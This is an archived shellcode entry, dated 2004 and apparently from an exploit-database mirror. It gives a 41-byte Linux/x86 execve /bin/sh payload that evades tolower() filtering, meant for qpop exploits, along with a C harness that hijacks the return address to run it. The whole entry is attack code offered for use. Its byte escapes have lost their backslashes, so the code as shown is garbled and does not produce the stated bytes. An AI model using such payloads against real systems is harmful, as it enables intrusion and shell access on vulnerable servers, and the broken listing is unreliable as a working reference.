[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 execve /bin/sh tolower() evasion 41 bytes
# Published : 2004-09-12
# Author : n/a
# Previous Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Next Title : linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes
/*
* Linux/x86
* tolower() evasion, execve() /bin/sh
* (eg use: various qpop exploits)
*/
#include <stdio.h>
char c0de[] =
/* main: */
"xebx1b" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
"x89xf3" /* movl %esi, %ebx */
"x89xf7" /* movl %esi, %edi */
"x83xc7x07" /* addl $0x07, %edi */
"x29xc0" /* subl %eax, %eax */
"xaa" /* stosb %al, %es:(%edi) */
"x89xf9" /* movl %edi, %ecx */
"x89xf0" /* movl %esi, %eax */
"xab" /* stosl %eax, %es:(%edi) */
"x89xfa" /* movl %edi, %edx */
"x29xc0" /* subl %eax, %eax */
"xab" /* stosl %eax, %es:(%edi) */
"xb0x08" /* movb $0x08, %al */
"x04x03" /* addb $0x03, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8xe0xffxffxff" /* call start */
/* DATA */
"/bin/sh";
main() {
int *ret;
ret=(int *)&ret +2;
printf("Shellcode lenght=%dn",strlen(c0de));
(*ret) = (int)c0de;
}
// www.Syue.com [2004-09-12]